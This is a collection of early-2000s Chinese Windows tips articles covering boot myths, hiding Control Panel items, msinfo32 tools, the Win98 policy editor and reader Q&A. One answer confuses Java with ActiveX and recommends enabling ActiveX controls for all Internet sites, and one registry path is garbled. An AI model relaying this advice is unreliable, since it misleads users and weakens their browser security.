微软专门针对这个问题，在代号为ＫＢ３１６６６６（ http://support.microsoft.com/?id=316666 ）的知识库里面作了详细说明。而组策略里面修改的数值指的是当使用了ＱｏＳ ＡＰＩ编写程序需要访问网络时能够使用的最大带宽量，如果我们设置为０％，那就意味着使用ＱｏＳ ＡＰＩ编写的应用程序不得不和其他应用程序争夺有限的带宽，可能产生的后果就是需要优先通信的数据没有得到优先权。当然，ＱｏＳ 这个本来用于改善网络质量的新技术也就丧失了意义。

谣言之四：改个参数，加个软件，启动速度就变快

诱惑指数：６ 危险指数：２

我们经常可以看到所谓的对Ｂｏｏｔ．ｉｎｉ优化来加快Ｗｉｎｄｏｗｓ启动速度的措施：把每一个启动项末尾的ｆａｓｔｄｅｔｅｃｔ 修改为ｎｏｄｅｔｅｃｔ。从字面上来看，是把启动的快速检测改为了不检测，但是最大的问题在于Ｂｏｏｔ．ｉｎｉ里面的参数列表中 没有ｎｏｄｅｔｅｃｔ这个参数，在微软公布的技术资料里面，从Ｗｉｎｄｏｗｓ ＮＴ到最新的Ｗｉｎｄｏｗｓ Ｓｅｒｖｅｒ ２００３，ｎｏｄｅｔｅｃｔ这个参数都不存在，使用这个杜撰出来的参数，也许不会出现问题，但是是否能够加快启动速度还是一个未 知数。

对于ｆａｓｔｄｅｔｅｃｔ这个参数，微软倒是给出了详细的解释：关闭Ｎｔｄｅｔｅｃｔ．ｃｏｍ对串口鼠标在启动时的检测。

但为加快系统启动速度，有些人还是痴心不改。碰巧的是，微软发布了一个叫做Ｂｏｏｔｖｉｓ．ｅｘｅ的程序，而且里面有一个菜单下 面有一个“Ｏｐｔｉｍｉｚｅ Ｓｙｓｔｅｍ”的选项，于是就出现了一种优化启动的技巧：使用Ｂｏｏｔｖｉｓ．ｅｘｅ能够加快Ｗｉｎｄｏｗｓ ＸＰ的启动速度。事实上呢，Ｂｏｏｔｖｉｓ．ｅｘｅ是一个微软提供给系统设计师和软件开发人员的可视化性能追踪工具，开发人员能 够用这个工具追踪系统启动或唤醒上出现的问题。但很遗憾的是，该工具被用在了很不恰当的场合。

微软也在 http://www.microsoft.com/whdc/hwdev...ot/bootvis.mspx上提到，Ｂｏｏ ｔｖｉｓ．ｅｘｅ是不能改变系统的启动或唤醒性能的。

编后：因为篇幅有限，我们这次不能把所有的“谣言”一一澄清。但从上述的例子中，已经可以看出，现在的谣言几乎都隐藏在看似正确 的操作或者理论中，或者便是道听途说，而忽略了更深层的含义。现在，我们需要做的就是尽可能深入地去了解某种技术的用途。了解并 不难，看看系统自带的帮助一般都能够知道。对于层次稍高的用户，可以借助厂商提供的各种资料，获取详细的信息。

碰到谣言不可怕，可怕的是不能识别谣言。所以，我们在这里希望所有的读者能够掌握更多的知识，以避免因为误解而导致出现更严重的 问题。


隐藏控制面板选项又一法

《一键清理系统垃圾》

隐藏控制面板选项又一法

    控制面板是Windows中的一个系统工具，用它可对Windows作一些重要的系统设置，有时我们并不想让别人在自己的机子上瞎改，因此就须隐藏部分敏感项目。下面，笔者介绍一种简单的方法来达到这个目的。
    控制面板本身有一个配置文件control.ini，（存放在Windows安装文件夹下）通过改动此文件可达到这一目的。
    由于此文件是一文本文件，所以请记住务必用文本编辑软件打开它，Windows中已经自带了一个记事本程序，我们就用记事本程序来打开它。以下就是我机器上的该文件第一段的内容。只须这样一设置，我的控制面板中便什么也没有了。具体为：在control.ini中有一个[don＇t load]字段（假如没有可以添加上去，在两个单词之间有一空格），在其后跟上类似于“joystick.cpl=yes”的语句，即表示该选项不在控制面板中显示，如：
    [don＇t load]
    joystick.cpl=yes
表示隐藏“游戏控制器”
    midimap.drv=yes
表示隐藏“区域设置”
    access.cpl=yes
表示隐藏“辅助选项”
    appwiz.cpl=yes
表示隐藏“添加／删除程序”
    desk.cpl=yes　表示隐藏“显示”
    inetcpl.cpl=yes
表示隐藏“Internet”和“用户”
    intl.cpl=yes
表示隐藏“区域设置”
    joy.cpl=yes
表示隐藏“游戏控制”
    main.cpl=yes
表示隐藏“打印机、键盘、鼠标、输入法、字体”
    mmsys.cpl=yes
表示隐藏“多媒体、声音”
    modem.cpl=yes
表示隐藏“调制解调器”
    netcpl.cpl=yes
表示隐藏“网络”
    odbccp32.cpl=yes
表示隐藏“32位ODBC”
    password.cpl=yes
表示隐藏“密码”
    powerefg.cpl=yes
表示隐藏“电源管理”
    sticpl.cpl=yes
表示隐藏“扫描仪与数字相机”
    sysdm.cpl=yes
表示隐藏“系统”和“添加新硬件”
    telephon.cpl=yes
表示隐藏“电话”
    themes.cpl=yes
表示隐藏“桌面主题”
    timedate.cpl=yes
表示隐藏“日期／时间”
    tweakui.cpl=yes　表示隐藏“TweakUI”


隐藏你的桌面

《一键清理系统垃圾》

隐藏你的桌面

《中国电脑教育报》LaLa

    在工作中经常需要离开你的计算机去做一些其他的事情，但又不想让其他人动你的机器，怎么办？一般来说，有这样几种办法：使用屏保加密码；使用Windows 2000/XP锁定工作站；使用各种软件来锁定你的桌面，其实我们还可以用一种方法来隐蔽你的桌面，让想看你计算机的人一头雾水，使你的机器更安全。

    在Windows 2000中，先把你所有正在运行的程序最小化，然后用“Ctrl+Alt+Del”调出任务管理器，在进程标签中找到Explorer.exe这个进程，结束它，并关掉任务管理器，这时你的桌面上一片茫然，和有些时候系统进程崩溃时一样，什么也看不到，一般人是不知道发生了什么事的，然后你就可以干其他事了，想要回到你的桌面时，只要调出任务管理器，在“应用程序”标签中新建一个C:\WINNT\explorer.exe的进程（WINNT为安装路径，需要时换成Windows），你的桌面就回来了，但是系统托盘中的QQ图标可能会丢失，这时可先把“应用程序”标签中的QQ选项去掉，关闭任务管理器再打开，然后再把“应用程序”标签中的QQ选项选中，就可使QQ图标出现。

    以上方法在Windows 2000/XP中验证通过。


安装 Windows XP 后硬件不兼容的处理

《一键清理系统垃圾》

安装 Windows XP 后硬件不兼容的处理

2002-02-22　　　　 作者：贺新锋

前几天，笔者为了赶时髦，决定将系统升级为 Windows XP。虽然阅读安装说明写得很清楚：“安装过程中系统要检查硬件，可能部分硬件不能正常工作”，但并没有动摇我的升级之心。在安装进行到“系统检查”项时，就显示出警告提示“安装程序发现计算机上的硬件或软件可能不能在 Windows XP上工作。因此，在升级前，您需要阅读并理解此升级报告。”并列出了与 Windows XP 不兼容的硬件信息。
    当时我没有理会，跳过这些信息继续安装，接下来的安装倒很顺利。安装完后，进入 Windows XP。打开一个文本文档，拨动鼠标中间滚轮，咦，怎么没反应？打开“系统属性”->“设备管理器”，在鼠标项显示“普通 PS/2 Port Mouse”，我这可是双飞燕“快活林 3D 鼠标”呀！试着删除鼠标的驱动程序，再重新安装，按照提示重新启动系统，OK，我的“双飞燕”又飞回来了。

    接下来拨号上网，我用的是 163 公共账号和 167 上网卡两种方式，无论用哪个号连接都没有拨号音，并显示“调制解调器没有打开”，看来系统不认我的 QXCOMM 56K 内置 MODEM。打开“开始”->“连接到”，看到账号163、167 上全打着红叉，再打开“开始”->“控制面板”->“性能和维护”->“系统”->“硬件”->“设备管理器”，看到“调制解调器”项为空，而有一项“未知的 PCI 控制器”，前面打开黄色的问号。删除这一项，再来添加新硬件，点击“系统属性”->“硬件”->“添加硬件向导”，系统开始搜寻新硬件，结束后显示“并未发现新硬件”，并给出“硬件是否已连接”的选项。选“是”，然后按提示选“安装我手动从列表中选择的硬件”，再选“调制解调器”，从列表中选择“56000Kmodem”，将 Modem 驱动盘放入光驱，选 Windows 2000 下的驱动程序，安装过程中，出现“QXCOMM PCI MODEM 未经微软认证，请与你的产品经销商联系”的警告提示。不管它，强行安装，安装结束后，打开“设备管理器”的“调制解调器”，看到已有“QXCOMM PCI MODEM”项。用鼠标点击该项，选“属性”->“诊断”->“查询调制解调器”，等系统查询完后给出“调制解调器没有响应”的提示，看来系统还是没有检查到 MODEM。难道我的“小猫”不能在 Windows XP 下工作？

    从“设备管理器”中再删除“QXCOMM PCI MODEM”，重启系统。这时提示检测到新硬件，按照提示向导，重复上述过程安装驱动程序，因为系统并不认我这只“猫”，因此安装时我选择“安装我手动从列表中选择的硬件”。当然在安装过程中还有“QXCOMM PCI MODEM 未经微软认证，请与你的产品经销商联系”的警告提示。别管它，继续下去。安装完后，再选“属性”->“诊断”->“查询调制解调器”，这时随着“嘀嘀”两声，很快给出了“猫”的响应信息。

    此时我一阵狂喜，赶紧连接“167”，当检测用户名和密码时显示“用户名和密码错误”，并自动断开连接。又试“163”，还是一样，审怎么回事？“猫”能拨号，并能检测出用户名和密码，说明硬件没问题，而用户名和密码错误可能是域或使用权限的问题。于是我试着删去“163”，再打开“开始”->“控制面板”->“网络和 Internet 连接”->“网络连接”->“创建一个新的连接”，重新建立 163 连接，随后拨号上网，一切 OK！同样删去“167”，重新建立原来的“167”账号，也成功了。

    经过这次实践和总结过去的经验，我认为，重装系统或升级系统后，如果出现硬件问题，解决办法如下：1、重装驱动程序；2、若第一步解决不了问题，则删除该硬件，再重启系统，大部分情况系统会发现新硬件，然后按照提示加装硬件驱动程序；3、若第二步还解决不了问题，那就只能打开机箱，重新插装该硬件（注意一定要先要在“设备管理器”中删除该硬件），一般总会解决问题的。


用好你的“系统信息”

《一键清理系统垃圾》

用好你的“系统信息”

     有这样一个故事:很久以前，人类计划并实施修建一座宏伟的建筑——巴别塔。这座塔很高很高，甚至可以通往天上。看着地上的人类众志成城、一点一点把巴别塔越建越高，上帝恐慌了，害怕人类的团结会影响他的权威。于是，他混淆了人类的语言，让大家互不了解起来。最后，这座通天之塔终究只成为了一个神话……
    巴别塔的故事当然只是一个寓言神话，但现实生活中由于不了解而造成的误会、失误多得举不胜举。面对电脑，你也许不必知道每一次的鼠标移动和点击背后，电脑各部件千万次默默无闻的运作。但你起码应该了解硬件、系统组件以及软件环境的一些相关信息，否则，构建一个最优化的电脑系统，并用它来出色地完成各种工作、学习、娱乐任务无异于水中月、镜中花。
    现在，请运行“开始”→“程序”→“附件”→“系统工具”→“系统信息”（或直接在“运行”中输入msinfo32），从了解电脑的“系统信息”开始了解你的电脑（见图1）。
    一、“系统信息”概述
    按照微软的说法，“系统信息”是负责收集和显示系统配置信息的，当技术支持专家（呵呵，也就是玩家你呀）在解决配置问题时，使用“系统信息”就可以快速查找到解决系统问题所需的数据。
    “系统信息”显示硬件、系统组件和软件环境的全面视图。显示的系统信息被组织到“系统摘要”和三种顶级类别，分别对应于控制台树上（“系统信息”界面的左边窗口）的“硬件资源”、“组件”、“软件环境”节点。
    “系统摘要”节点显示关于计算机和安装的Windows操作系统版本的常规信息。该摘要包含系统的名称和类型、Windows系统目录名、地区选项以及有关物理和虚拟内存的统计。
    “硬件资源”节点显示硬件专用的设置，即DMA、IRQ、I/O 地址和内存地址。“冲突/共享”节点识别正在共享资源或发生冲突的设备。它有助于识别设备的问题。
    “组件”节点可显示Windows配置的相关信息，并用于确定设备驱动程序、联网和多媒体软件的状态。另外，一个全面的驱动程序历史记录将显示不同时间组件发生的更改。
    “软件环境”节点显示计算机内存中加载的软件的概述。该信息可用于查看进程是否仍在运行，也可用于检查版本信息。
    当然，其它应用程序也可能在“系统信息”控制台树上增加节点（例如图1窗口中的“Office 10 Applications”）。
    你还可以把“系统信息”中显示的内容导出为多种格式的文件（文本和系统信息文件）、选择显示网络上其它计算机的信息（Win2000是在“系统信息”主菜单的“操作”→“属性”中输入计算机名，见图2;WinMe是在“查看”→“远程计算机”。当然，前提是对方开启了此项服务并且你的用户在对方计算机的管理员组中）、以及方便地调用一些平常你可能没有注意到的“工具”……总之，“系统信息”就是一个集成界面（也就是微软力推的MMC，Microsoft Management Console），把你需要了解的系统信息和一些使用方便的工具集合在一起。
    作为读者，也许很讨厌按部就班一个一个菜单讲解功能。因此，下面就用一系列实例来展现“系统信息”工具的方便之处，当然不可能面面俱到，但玩家们最擅长的不就是举一反三吗……
    二、“系统信息”应用实例
    “系统信息”使用得最多的地方是主菜单中的“工具”，对于Win9x/Me/2000，“工具”中的应用程序有很大的不同，因此下面的实例只针对其特定的操作系统。
    1.调校完美的Win2000 3D游戏平台
   WinMe推出之后已经成为游戏玩家们的首选操作系统。不过WinMe是建立在Win9x基础之上的，仍然无法摆脱容易死机的恶名，想想，一个容易崩溃的系统无异于是把玩家辛苦搏杀的成果毁于一旦的恶魔！为什么不使用更稳定的Win2000？在Win2000中，个别应用程序即使陷入死循环而令系统失去反应，也可以通过“任务管理器”强行将其中止而不会殃及Windows死机。此外，Win2000也支持各种游戏设备（摇杆、手柄）和DirectX，音效方面和Win9x/Me无异。而且在Win2000下以OpenGL编写的游戏（典型代表作就是Quake）有比Win9x/Me下更高的FPS表现，但是D3D游戏的表现却与Win9x/Me相差甚远，尤其针对目前主流的Geforce系列显卡来说更加明显——同样配置在Win2000下的FPS还不及Win9x/Me的一半！由于D3D仍然是目前的主流，绝大多数游戏都是以D3D编写的，因此Win2000由于在D3D方面的奇差表现肯定要被玩家所摈弃。
    产生这种现象的原因是Win2000本身的一些Bug。在多数情况下，AGP显卡不能使用AGP贴图，严重一点的甚至是连AGP接口都无法正常工作。当然，不能凭空“诽谤”Win2000，我们需要事实来说明Win2000蹩脚的3D性能——现在，请运行“系统信息”主菜单中“工具”下的“DirectX诊断工具”（见图3，你也可以直接在“开始”→“运行”中运行dxdiag.exe）。我们使用的是Abit Geforce MX和VIA的KT133主板，从图4可以看出，其“显示”部分根本就没有支持AGP显卡;也就是说，虽然硬件是AGP显卡，但操作系统的AGP接口根本没有启动，显卡的数据传输速度等同于PCI接口，而且系统的主内存也不能提供给显卡作为贴图时的材质缓冲。
    在Win2000的设计中，对于nVIDIA的NV10/15（包括Geforce和Geforce MX系列）来说，其硬件T&L部分的几何数据是存放在系统内存中而不是显卡的显存中。显示接口不支持AGP就意味着T&L数据不能有效传输（2X AGP接口的传输速率为533MB/s，而4X AGP接口的传输速率为1066MB/s，但PCI接口则只有128MB/s），因此在失去了硬件T&L优势、传输带宽又严重不足的情况下，Geforce显卡在Win2000中的D3D表现不及Win9x/Me下的一半也就不难理解了，而且谁还会用这样慢速的操作系统来玩游戏呢？
    如果使用的不是VIA芯片组而是Intel的440BX或i815E，显示卡也不是Geforce系列而是其它的，那么情况又会如何呢？图5使用的是3Dlab的PERMEDIA2，虽然“AGP支持”标明的是启用，但不知道你注意到没有，其右侧的测试按钮只有DirectX而没有AGP纹理？由此看来Win2000仍然无法支持AGP的贴图功能，也就是说显卡不能借助系统内存来存放贴图材质和其它数据，其3D性能仍然非常之差……
数落了Win2000在3D方面这么多不是之处，当然要说说解决方案，很简单——你只需要打上Win2000系列的Service Pack 1（SP1，在http://windowsupdate.microsoft.com/下载），再安装Win2000版的DirectX 8（在http://www.microsoft.com/downloads/下载，注意操作系统及语言版本的对应）。如此一来，你的Win2000在“DirectX诊断工具”的“显示”项中已经和Win9x/Me相同了（见图6）。另外，对于4X AGP和Fast Write的支持可能还需要使用你的显卡制造商所提供的工具程序。
    经过一番修补，Win2000的3D显示性能有了成倍的提高。图7就是Win2000在未启动AGP前、安装SP1+DirectX 8之后、以及同样使用DirectX 8的WinMe的3D Mark2000的得分比较，可以看出Win2000和WinMe的3D性能已经非常接近，作为稳定的游戏完全可以胜任。
    由此看来，没有完美的系统，仍然可以得到相对满意的结果。通过自己的分析、修补。“DirectX诊断工具”中还有不少有用的信息和测试，你可以根据这些打造出符合自己需要的多媒体平台。
    2.告别程序出错时的剧烈读盘
    如果你使用Win2000应该有这样的经历:当某个程序出错后，系统会跳出一个警告窗口同时关闭该出错程序，其间伴随的剧烈硬盘读写和形如死机的系统状况一定让你烦恼不已……Win2000到底在这个紧要关头做些什么？当Win2000中出现程序错误时，系统将搜索并调用程序错误处理程序。对于Win2000的默认安装，Dr. Watson就是这个错误处理程序。程序出错之时，Dr. Watson将反汇编相关指令，在关闭出错程序的同时Dump当前内存状况，这一切内容都将保存在\Documents and Settings\All Users\Documents\DrWatson\目录中。其实，Dr. Watson所获得并记录的信息是技术支持组诊断运行Windows程序错误所需的信息，这些对于普通用户来说，完全没有任何价值——人们会感慨“有多少爱可以重来”，总不能惋惜“有多少错可以再犯”？况且这些错误信息对大多数人来说还是“你的柔情我永远不懂”。因此，我们的当务之急就是让警告照旧，至于其它的事，Dr. Watson就省省吧。
运行“系统信息”主菜单中“工具”下的“Dr Watson”（或者直接运行），把除“视觉通知”之外的选项都取消（见图8）。于是，整个世界便变得清静了……
    对于Win9x/Me，“Dr·Watson”的选项无法设置那么多，但你可以打开其中的“高级视图”查看更多的相关信息。
    3.安全注册表
    系统总是保存着注册表配置（包括用户账号信息、协议绑定、软件程序设置和用户首选项）的备份副本。如果当前注册表出现了问题，可以使用备份副本。每次重新启动计算机时，“注册表检查程序”将自动扫描注册表。如果“注册表检查程序”发现有问题，它将会自动用备份副本替换当前注册表。当然，如果注册表包含引用了不再存在的文件（如“.vxd”文件）的注册表项，则“注册表检查程序”并不修复该注册表项。
    我们实际的用途就是当你新安装了一个不太了解的软件后，可以启动“系统信息”的“工具”菜单中的“注册表检查程序”来扫描注册表，如果新安装的软件破坏了注册表，“注册表检查程序”能够用以前的备份恢复。当然，我们最希望的还是图9这个窗口。另外，需要注意只有Win9x/Me的“系统信息”提供“注册表检查程序”工具。
    4.保全你的系统文件
    不知道大家有否留意我在本刊2001年1期上的一篇讨论WinMe系统文件保护的文章？其中介绍了WinMe和Win2000分别使用SFP及SFC来避免产生DLL Hell，但Win9x怎么办呢？难道微软在开发Win9x时根本没有考虑过DLL Hell？那倒还不至于，对于Win9x，微软针对DLL Hell的补救措施是“系统文件检查器”（当然，“系统文件检查器”的功用不仅仅局限于此）。
    在“系统信息”的“工具”菜单中运行“系统文件检查器”（见图10），可检测操作系统文件的完整性，如果这些文件损坏可以将其还原，还可以从安装盘中解压缩安装文件（如驱动程序）。在还原原始文件前“系统文件检查器”可以备份已有的文件，也可以根据文件夹和文件扩展名自定义搜索条件。
    三、后记
    以上的内容仅是对“系统信息”的管中窥豹，其它还有很多工具需要你自己去探索，例如用于配置远程或本地Win9x/Me计算机的“WMI设置工具”;可以识别并标记在以前启动时导致Windows停止响应的故障，以便在随后的启动过程中绕过该故障的“自动跳过驱动程序代理”等等。其实学习电脑就是一个不断尝试的过程，对于操作系统来说，最大的失误不过是重新安装系统而已，因此，放心大胆地尝试吧。


用系统策略编辑器实现多用户管理

《一键清理系统垃圾》

用系统策略编辑器实现多用户管理

    很多朋友想知道如何在Win98下实现多用户登录，保护自己的设置。一般提供的方法是修改注册表，使别人无法通过取消按钮登录，但匿名用户（指随意输入用户名）依然能够登录，且他一样可以通过修改设置使计算机系统崩溃。其实，使用系统策略编辑器就可以实现多用户管理，方法介绍如下。
    系统策略编辑器不是Win95／98的正常安装组件，安装时是无法将其加载到你的系统中的，要安装它要进行以下步骤：
    1．在控制面板中双击“添加／删除程序”，再单击“Windows安装程序”选项。
    2．单击“从磁盘安装”按钮。在出现的对话框中单击“浏览”，选定Win98安装光盘，在文件夹中选择x:\tools\reskit\netadmin\poledit，在文件名中选择poledit.inf（x是安装盘所在驱动器盘符）。
    3．在组件框内勾选系统策略编辑器和组策略，单击“安装”。安装结束后应在“开始”菜单的“程序／附件／系统工具”中增加“系统策略编辑器”程序项。
    安装完成后就可以使用了，在“开始”菜单中选择系统策略编辑器，即出现它的主窗口。它有两种编辑模式，一种是注册表模式，另一种是策略文件模式。只有第二种模式支持多用户管理。所以我们就用策略文件模式来讲述如何实现多用户管理。
    一般来说，Win98登录的用户有三种类型：一是管理员supervisor；另一种是一般用户user；还有一种是非法用户。
    首先用supervisor登录（当然应该已是各用户使用不同的个人设置，没有的话在控制面板的“密码”和“用户”中设置，用户名可以自己定）。启动系统策略编辑器。在“文件”菜单上单击“新建文件”，这时在窗口中应看到“默认用户”和“默认计算机”两个图标。在“编辑”菜单上单击“添加用户”，键入supervisor，然后单击确定，将supervisor用户添加到编辑器中。用同样的方法把一般用户添加到编辑器中。这样窗口中就有管理员、一般用户、默认用户（随意输入新用户名进入者）、默认计算机四个图标，双击任一图标可对其进行设置。如何限制就看你的了（建议对默认用户只让他关闭系统就行了）。
    对于策略项来说，打钩是启用该策略，灰色是使用默认用户的策略，空白是不使用该策略。定制完后使用“文件”菜单中的“保存”命令，把上面的设置保存到文件c:\windows\config\config.pol，（目录名不同可以，但最好保存到Win98安装目录下）。
    下面我们来定制按“取消”按钮进入的用户：
    先注销supervisor，按“取消”进入，启动系统策略编辑器。然后使用“文件”菜单中的“打开注册表”命令，导入注册表。在窗口中双击“本地用户”图标，应该在策略项中禁止他除了关闭系统外的任何自由。这样所有的用户策略就设置完了。最后，双击本地计算机，展开“系统”策略组下的“启用用户配置文件”并选中它。再展开“网络”策略组的“更新”下的“远程更新”并选中它，在“更新方式”中选择“手动（使用特定路径）”，在下方输入路径c:\windows\config\config.pol，单击“确定”。
    终于设定完了，但别忘了用“文件”菜单的“保存注册表”命令把以上设定保存到注册表。赶快重启试一下，是不是有点使用WinNT的感觉。


有问必答

《一键清理系统垃圾》

有问必答

《中国电脑教育报》苗得雨

    网络类

    吉林云逍遥：Foxmail可以通过在邮件服务器上备份邮件的功能将信件备份。但是，我最近发现Foxmail无法正常使用这些备份，因为Foxmail软件不能接收已经接收过的邮件，请问分析家能否帮忙解决。

    点击Foxmail工具栏上的“远程管理”按钮，在打开的“远程信箱管理”对话框中点击“信息”按钮，则在服务器上备份的信件都会在信息框中显示出来，选择需要重新下载的邮件，点击“收取”按钮，最后再点击“执行”便可将备份过的邮件再收取一次。

    济南海涛：请问分析家，我上网时QQ上的朋友经常问我，我的IP地址是多少？可我不知道，我怎样才能获得自己的IP地址呢（我用的是Windows 2000操作系统）？

    我们先进入Windows 2000操作系统，在“开始”菜单中打开DOS方式，然后在命令提示符上运行“Ipconfig.exe”命令，怎么样，看到自己的IP地址没有？

    系统类

    北京高曼：我使用的是Windows 98操作系统，因为在学校住宿的原因我设置启用了Windows 98的用户密码功能，但是随后发现别人只要在进入系统时选择“取消”仍能进入操作系统，这个开机密码完全失去了作用，请问有没有解决的途径？

    如果你想增强Windows 98的这项安全功能，就需要在进行几步设置。首先在“控制面板”的“网络属性”中，将登录方式改为“Microsoft友好登录”。如果没有该选项，则需要添加它，点“添加”按钮，双击“客户”，在“厂商”列表中选“Microsoft”，在右边的列表中找到“Microsoft友好登录”，选定它，然后点“确定”即可。接下来建立一个新用户。在“控制面板”的“用户”中，点“新建”按钮，建立一个或多个用户名，并输入相应的密码。最后运行Regedit.exe打开注册表，打开“HKEY_LOCAL_MACHINENetworkogon”，在右栏中新建一个Dword值，改名为“Mustbe Validated”，并将值改为1。经过上面步骤后，你再开机试试，当出现密码输入框时若不正确输入用户密码，就再也无法按Esc或者“取消”跳过了。

    不过要最大限度地防止非法用户访问你的电脑，还有很多其他方面是需要防备的，比如防止开机后进入安全模式、DOS模式、配合主板BIOS开机密码设置等。其实要保证电脑上数据不被非法用户使用，最安全、最彻底的解决方法还是安装Windows 2000/XP等支持NTFS分区的操作系统(或Unxi、Linux、Openvms等其他安全操作系统)，这样就可以获得相当强的安全保障。

    上海仕杰：我的电脑最近一段时间总是不能正常关机，我怀疑操作系统感染了病毒。随后我重新安装了Windows 98 操作系统。可是安装完毕重启开机我发现电脑只能找到光驱、软驱和C盘，硬盘的其他几个分区都找不到了，重要的文件全不见了。分析家，我现在该怎么办？是否还能够找回以前的重要文件？

    如果想找回重要的文件，你可以先检查一下硬盘上的扩展分区以及各逻辑盘是否还在。方法是：制作一张引导电脑启动的软盘，将Windows 98上的Fdisk.exe文件拷贝到这张软盘上，启动电脑后运行Fdisk，就可以查看硬盘上的扩展分区和各逻辑盘的详细情况。如果信息是正常的，你就可以找一台启动正常的电脑，将这块硬盘作为那台电脑的从盘就可以将你些丢失的分区找回来了，重要的文件也重新出现了，这时你就可以将重要资料备份，备份完成后你可以将硬盘重新分区格式化。

    本周分析家小提示

    我们日常使用的很多软件中都隐藏了一些有趣的小秘密，我们将这些小秘密称之为复活节彩蛋（Easter Eggs）。比如开发人员名单、一个小游戏、一段动听的音乐、几个卡通人物、一幅幽默的图片、几句玩笑话、精彩的3D影音游戏等。它是软件开发者为了增加软件的趣味性而专门设计的。在我们熟悉的QQ中也隐藏了这样一枚彩蛋，即“给你一千年的回忆”，下面就请你跟分析家一起做。

    首先按下QQ界面左下角的“QQ2000”长条按钮，在弹出的菜单里选择“帮助/关于”，然后在“关于QQ”窗口中对着显示板本号信息的那一行（http://www.tencent.com下面那行）用鼠标左键点击大约十次左右，注意不要点击太快，一秒钟一次就可以了，然后您就会发现版本号突然变为“给你一千年回忆”。要再次打开这个彩蛋需要重新启动QQ。如果您使用的是打过IP补丁的版本，得到的彩蛋将会有所不同。怎么样，看到彩蛋了吗？


有问必答

《一键清理系统垃圾》

有问必答

《中国电脑教育报》苗得雨

    上海李广：我在使用Windows XP的时候发现系统目录下会有一个名为Pagefile.sys的文件，它的大小经常发生变动，大的时候达到数百兆，请问分析家这到底是个什么文件？

    不用担心，它其实是Windows的“虚拟内存交换文件”。其作用是拿一部分的硬盘空间来当作内存使用，先把内存中一些闲置太久的数据存到硬盘上，等你要回头再用的时候，再从Pagefile.sys里调出。

    它并不是永远维持固定大小（除非你限制了虚拟内存的大小），运行的应用程序越多它就越大，它会根据内存使用状况自动调整大小。改变这个页面文件位置的方法是：用鼠标右键点击“我的电脑”，选择“属性→高级→性能设置→高级→更改虚拟内存”，在驱动器栏里选择想要改变到的位置即可。

    苏州思雨：我的机器上莫名其妙出现了一大堆的WMI错误信息，虽然它并没有影响到机器的速度，但是我仍然想搞清楚这个WMI是一个什么东西？如何能够不让我看到它们？

    其实这个WMI全称“Windows Management Instrumentation （Win-dows管理规范）”，是“Microsoft 基于 Web 的企业管理”(WBEM) 的实现，为访问和共享企业网络管理信息主动建立的一种标准。看不明白没有关系，我马上教你如何隐藏这个东东，你只需要打开“控制面板”，点击“管理工具”选项，然后打开“服务”项，找到“Windows Management Instrumentation”与“Windows Management Instrumentation Driver Extensions”两个服务，将其改为手动并停掉就万事OK了！

    网友小猪：Windows中的“发送到”给我的操作带来很大的方便，因此我想让它发挥更大的作用，请问分析家能在里面添加其他目的地吗？

    这不成问题，你只需要进入到“C:\Windows\Sendto”文件夹，在其中新建一个你想发送到目录的快捷方式就可以了。

    单击“文件→新建→快捷方式”，此时会出现一个对话框，在对话框中“命令行”空白栏中输入新的目的地，如“D:\临时文件夹”，然后按“下一步”，在“选择快捷方式的名称”空白栏中输入快捷方式的名称，如“D盘中的临时文件夹”，最后点击“完成”。此时你再选择一个文件点击右键就会发现“发送到”级联菜单里多了一个“D盘中的临时文件夹”选项了。

    上海灰姑娘：最近回收站出现了一个奇怪的现象，明明已经将回收站清空了，而回收站的图标显示却是满的，请问分析家这到底是什么原因？

    打开资源管理器，在磁盘驱动器 C 的图标上按鼠标右键，选“属性”，在“常规”这页，按“磁盘清理”钮，把所有的项目全部打勾，按“确定”，看能不能恢复正常。 也可在桌面上空白的地方，按一下鼠标右键，选择“属性”，到“效果”这一页，选“回收站（空）”，按“默认值图标”，然后再按“确定”，这个时候应该OK了。

    网友发条橘子：最近我从网络下载MIDI格式的音乐文件，解压缩后使用WMP播放出现了一些问题，虽然播放时画面上也显示正在播放，喇叭也开了，为什么还是没声音呢？

    如果播放其他声音文件正常，那你就要检查一下关于 MIDI 这部分的设置了—— 被设成静音？双击屏幕右下角的黄色小喇叭，打开之后，看看是不是 MIDI 的“静音”功能被勾起来了，如果是的话把它取消掉，如果没有就检查一下声卡驱动程序，如果正常，再检查是不是没有启动 MIDI 。

    在Windows 2000中打开“控制面板”的“声音与多媒体”，到“音频”页，选择“MIDI音乐播放”（声音播放），按“属性”，检查有没有设为“使用这个设备控制功能”，必须选取这项MIDI 才会有声音。 如果还是没听到 MIDI 的声音，到“控制面板→系统→设备管理”，删除你的声卡，重新启动计算机，重新安装一次你的声卡驱动程序就可以了。

    本周分析家小提示

    你有没有遇到这样的问题，要费半天的功夫才能进入桌面上某个快捷方式或程序菜单中的某个程序所在的文件夹，我现在教你一个快速的方法：在某快捷方式的图标上单击鼠标右键，然后选择“属性”，再选择其中的“快捷方式”标签，最后点击“查找目标”就可以立即进入目标程序所在的目录了。


有问必答

《一键清理系统垃圾》

有问必答

《中国电脑教育报》苗得雨

    春节期间分析家接到了很多读者来信，但很多邮件本身携带病毒。故此，希望读者能够经常杀毒，并经常更新杀毒软件的病毒库文件，减少不必要的损失。

    网络类

    南京张端：我经常上网浏览一些财经网站，可最近总是有很多图片无法浏览，像财经网站上的外汇牌价表和走势图都打不开了，在图片的位置只是一个空白的边框，我用的是Windows 98操作系统，请问分析家，这是什么原因？

    现在类似于财经网站的很多特别网站为了扩展其网站的功能，都在网页上添加了很多属于Java部分的功能插件，例如ActiveX控件和插件等等。

    大概很多朋友听说了Java 控件有可能导致不安全情况的发生，就把Windows上的Java功能给屏蔽了。这样网站增加的控件和插件就不能自动运行了，当然也就不能看到那些图片，只能看到一个空白的边框了。只要启用Java功能，这个问题就解决了。在浏览器菜单上单击“工具→Internet选项”中的“高级”选项卡，选中“启用Java JIT编译器（需要重启动）”，在其前打勾，选中“多媒体”，在“显示图片”前打勾，最后在“安全→Internet→自定义级别→安全设置”中“启用”“运行ActiveX控件和插件”就可以了。

    上海鲁知杰：我的电脑装的是Windows 2000操作系统，由于工作需要，我经常把硬盘安装到不同的电脑上，所以我在电脑上加装了一个移动硬盘，请问分析家我是否还能够对操作系统进行优化，具体怎样操作？

